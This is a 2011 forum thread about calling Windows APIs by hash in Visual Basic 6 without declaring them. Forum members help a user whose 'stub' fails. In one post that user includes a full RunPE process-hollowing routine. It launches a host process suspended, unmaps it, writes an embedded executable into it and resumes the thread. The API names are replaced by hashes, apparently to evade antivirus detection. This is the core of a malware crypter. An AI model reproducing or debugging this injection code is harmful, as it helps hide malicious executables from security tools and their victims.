 Autor
|
Tema: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas (Leído 21,109 veces)
|
Karcrack
 Desconectado
Mensajes: 2.416
Se siente observado ¬¬'
|
Well, if you're taking the Hashes correctly it must work fine... check there's no problem with DEP (Windows) or native/p-code...
Make sure you're generating the hashes using the complete function name... p.e MessageBoxA
|
|
|
|
« Última modificación: 1 Noviembre 2011, 03:53 am por Karcrack »
|
En línea
|
|
|
|
Swellow
Desconectado
Mensajes: 77
|
Well, if you're taking the Hashes correctly it must work fine... check there's no problem with DEP (Windows) or native/p-code...
Make sure you're generating the hashes using the complete function name... p.e MessageBoxA
I've generated the hashes correctly using each complete function name, I used the tool you shared with us. I'm on Windows 7 x64 bits and I'm compiling in Native Code I never got the CallAPIByHash working, never understood why :/ My Stub was using CallAPIByName and it was working...
|
|
|
|
|
En línea
|
|
|
|
[L]ord [R]NA
Desconectado
Mensajes: 1.513
El Dictador y Verdugo de H-Sec
|
On 64bits maybe the hash would be different, check this with a Debugger or make a program to create Hashes automatically
|
|
|
|
|
En línea
|
|
|
|
Swellow
Desconectado
Mensajes: 77
|
On 64bits maybe the hash would be different, check this with a Debugger or make a program to create Hashes automatically
I have no idea on how to do this... Could you help me doing this please?
|
|
|
|
|
En línea
|
|
|
|
Karcrack
Desconectado
Mensajes: 2.416
Se siente observado ¬¬'
|
The hashes are the same... Can you post the code your using? Maybe the problem is with DEP...
|
|
|
|
|
En línea
|
|
|
|
Swellow
Desconectado
Mensajes: 77
|
The hashes are the same... Can you post the code your using? Maybe the problem is with DEP...
I don't know with which API's it's not working, how do I know? I have Invoked RunPE/Resource and a few APIs in Main: Main Module: 'fCallAPI ("KERNEL32"), ("RtlMoveMemory"), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile) ---> fCallAPI ("KERNEL32"), (&HCF14E85B), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile)
'fCallAPI "kernel32", "GetModuleFileNameW", 0, VarPtr(bBuff(0)), 1024 ---> fCallAPI "kernel32", &h45B06D8C, 0, VarPtr(bBuff(0)), 1024Resource Module: 'hRsrc = fCallAPI(("Kernel32"), ("FindResourceW"), hMod, ResName, ResType) ---> hRsrc = fCallAPI(("Kernel32"), (&h3BD09A6B), hMod, ResName, ResType)
'hGlobal = fCallAPI(("Kernel32"), ("LoadResource"), hMod, hRsrc) ---> hGlobal = fCallAPI(("Kernel32"), (&h934E1F7B), hMod, hRsrc)
'lpData = fCallAPI(("Kernel32"), ("LockResource"), hGlobal) ---> lpData = fCallAPI(("Kernel32"), (&h9A4E2F7B), hGlobal)
'Size = fCallAPI(("Kernel32"), ("SizeofResource"), hMod, hRsrc) ---> Size = fCallAPI(("Kernel32"), (&h3F2A9609), hMod, hRsrc)
'fCallAPI ("Kernel32"), ("RtlMoveMemory"), VarPtr(B(0)), lpData, Size ---> fCallAPI ("Kernel32"), (&hCF14E85B), VarPtr(B(0)), lpData, Size
'fCallAPI ("Kernel32"), ("FreeResource"), hGlobal ---> fCallAPI ("Kernel32"), (&h54423F7C), hGlobal
'fCallAPI ("Kernel32"), ("FreeLibrary"), hMod ---> fCallAPI ("Kernel32"), (&h4DC9D5A0), hModAnd all API's in kRunPE: Public Function fInjectExe(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long
Dim hModuleBase As Long
Dim hPE As Long
Dim hSec As Long
Dim ImageBase As Long
Dim gNumC As Long
Dim tSTARTUPINFO(16) As Long
Dim tPROCESS_INFORMATION(3) As Long
Dim tCONTEXT(50) As Long
Dim KERNEL32 As String
Dim NTDLL As String
KERNEL32 = "KERNEL32"
NTDLL = "NTDLL"
hModuleBase = VarPtr(bvBuff(0))
If Not GetNumb(hModuleBase, fClngW("2")) = fClngW("&H5A4D") Then Exit Function
hPE = hModuleBase + GetNumb(hModuleBase + fClngW("&H3C"))
If Not GetNumb(hPE) = fClngW("&H4550") Then Exit Function
ImageBase = GetNumb(hPE + fClngW("&H34"))
tSTARTUPINFO(0) = fClngW("&H44")
'CreateProcessW
Call fCallAPI(KERNEL32, &H16B3FE88, 0, StrPtr(sHost), 0, 0, 0, fClngW("&H4"), 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))
'NtUnmapViewOfSection
Call fCallAPI(NTDLL, &HF21037D0, tPROCESS_INFORMATION(0), ImageBase)
'NtAllocateVirtualMemory
Call fCallAPI(NTDLL, &HD33BCABD, tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + fClngW("&H50"))), fClngW("&H3000"), fClngW("&H40"))
'NtWriteVirtualMemory
Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + fClngW("&H54")), 0)
For gNumC = 0 To GetNumb(hPE + fClngW("&H6"), fClngW("2")) - fClngW("1")
hSec = hPE + fClngW("&HF8") + (fClngW("&H28") * gNumC)
'NtWriteVirtualMemory
Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + fClngW("&HC")), hModuleBase + GetNumb(hSec + fClngW("&H14")), GetNumb(hSec + fClngW("&H10")), 0)
Next gNumC
tCONTEXT(0) = fClngW("65543")
'NtGetContextThread
Call fCallAPI(NTDLL, &HE935E393, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
'NtWriteVirtualMemory
Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), tCONTEXT(41) + fClngW("&H8"), VarPtr(ImageBase), fClngW("&H4"), fClngW("0"))
tCONTEXT(44) = ImageBase + GetNumb(hPE + fClngW("&H28"))
'NtSetContextThread
Call fCallAPI(NTDLL, &H6935E395, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
'NtResumeThread
Call fCallAPI(NTDLL, &HC54A46C8, tPROCESS_INFORMATION(1), 0)
hProcess = tPROCESS_INFORMATION(0)
fInjectExe = fClngW("1")
End Function
Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
'NtWriteVirtualMemory
Call fCallAPI("NTDLL", &HC5108CC2, -1, VarPtr(GetNumb), lPtr, lSize, 0)
End Function
|
|
|
|
« Última modificación: 1 Noviembre 2011, 19:19 pm por Swellow »
|
En línea
|
|
|
|
Karcrack
Desconectado
Mensajes: 2.416
Se siente observado ¬¬'
|
The code is pretty confusing... it's hard to follow the calls without looking at the original API declarations neither the structure declaration... anyway looks like your passing the pointers incorrectly... can't help you much more... you should look at the functions return... using Msgbox() is the easiest way.. also the worst  |
|
|
|
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Ayuda[Loadlibrary] Cargar apis sin declararlas.
Programación Visual Basic
|
The Swash
|
3
|
5,234
|
1 Febrero 2010, 17:31 pm
por Karcrack
|
|
|
|
[VB6-SRC] mZombieInvoke - Llama APIs sin declararlas
« 1 2 »
Programación Visual Basic
|
Karcrack
|
11
|
8,686
|
14 Agosto 2010, 21:14 pm
por wh0!
|
|
|
|
Ayuda con el metodo Invoke y varias Dudas Sockets
.NET (C#, VB.NET, ASP)
|
CATBro
|
2
|
2,841
|
28 Octubre 2011, 07:00 am
por CATBro
|
|
|
|
[HELP] Invoke APIs
Programación Visual Basic
|
Swellow
|
1
|
1,729
|
4 Mayo 2012, 10:01 am
por Swellow
|
|
|
|
[C++ Template] Hasheado de APIs en compile-time - Invoke
Análisis y Diseño de Malware
|
Karcrack
|
4
|
3,423
|
24 Enero 2013, 22:13 pm
por Karcrack
|
 |
